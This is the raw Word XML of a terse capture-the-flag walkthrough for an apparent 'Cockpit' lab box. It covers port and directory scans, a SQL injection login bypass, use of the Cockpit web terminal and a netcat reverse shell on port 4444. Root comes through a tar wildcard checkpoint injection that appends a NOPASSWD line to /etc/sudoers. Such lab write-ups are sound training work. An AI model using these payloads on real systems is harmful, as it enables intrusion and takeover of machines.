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70CF717B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733D32">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cockpit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087F3AAE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733D3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C2DF9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2C2DF9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2C2DF9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C2DF9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2C2DF9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2C2DF9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2C2DF9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2C2DF9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C2DF9"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16FC04C5" w14:textId="4F0FE38F" w:rsidR="002C2DF9" w:rsidRDefault="002C2DF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apt install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dirsearch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-y </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E00FFD1" w14:textId="77777777" w:rsidR="00526EFF" w:rsidRDefault="00526EFF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2A489C14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whatweb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3E98682F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whatweb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t_ip:9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971789" w14:textId="52C4FA2E" w:rsidR="00843DCE" w:rsidRDefault="00A752B6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dirsearch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hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="009D0249">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://t_ip</w:t>
        </w:r>
      </w:hyperlink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B26E95F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visit the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED3CFBC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http://t_ip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login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="1EB64D8B" w:rsidR="00843DCE" w:rsidRDefault="00A752B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</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="009D0249">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://t_ip:9090</w:t>
        </w:r>
      </w:hyperlink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7EF66F8E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login.php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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’:admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4F2291DF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its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n-US"/>
        </w:rPr>
        <w:t>an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sql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injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C42F871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search payload all the things</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3041FE7D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sqlinjcetion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copy for login and intruder with past for both username and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECCC990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login 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admin’OR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>””=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’ in username and password both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415D9671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username and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E615414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decode it then we obtain perfect password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E353BD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and login into the :9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1056A5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login 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james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where the terminal is there so we obtain the local.txt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1F85A174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start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netcat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to 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648FAEA3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copy of base -I from shell generator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772B98B3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paste to the website terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8E0409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got the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093DB499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-l = we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>see .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F461791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gtfobins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search tar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</w:p>
    <w:p w14:paraId="5F02E22D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echo “echo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james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ALL=(root) NOPASSWD: ALL’ &gt;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etc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sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: &gt; privesc.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CABC3A6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chmod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+x privsec.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347D6EFA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mv privsec.sh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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B174516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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56C235C8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echo “” &gt; ‘- -checkpoint=1’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73961CDC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echo “” &gt; ‘- -checkpoint-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actiono</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=exec=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privesc.sh’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DE10A4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-l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423152FF" w14:textId="77777777" w:rsidR="00A752B6" w:rsidRPr="00843DCE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we can see no path = if still path then run it again </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7949DE4B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echo “echo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james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ALL=(root) NOPASSWD: ALL’ &gt;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etc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sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: &gt; privesc.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E1E566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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="722A4129" w14:textId="77777777" w:rsidR="00A752B6" w:rsidRDefault="00A752B6" w:rsidP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proof.txt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0D8C61" w14:textId="7053BDDA" w:rsidR="00A311DF" w:rsidRDefault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496EDE06" w14:textId="234A87C8" w:rsidR="00A752B6" w:rsidRPr="00A752B6" w:rsidRDefault="00A752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On desktop we obtain the proof.txt</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A752B6" w:rsidRPr="00A75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1A54F8"/>
    <w:rsid w:val="002160B2"/>
    <w:rsid w:val="002C2DF9"/>
    <w:rsid w:val="0039303F"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00526EFF"/>
    <w:rsid w:val="006025F7"/>
    <w:rsid w:val="006F19A1"/>
    <w:rsid w:val="00733D32"/>
    <w:rsid w:val="007526C0"/>
    <w:rsid w:val="00781F95"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="008A1CE8"/>
    <w:rsid w:val="00920B7F"/>
    <w:rsid w:val="00974706"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A752B6"/>
    <w:rsid w:val="00B023AE"/>
    <w:rsid w:val="00BA677C"/>
    <w:rsid w:val="00CD4CAB"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D029ED"/>
    <w:rsid w:val="00D32AE8"/>
    <w:rsid w:val="00F54EFE"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00FC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EFF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4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t_ip:9090" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://t_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20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-01T13:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>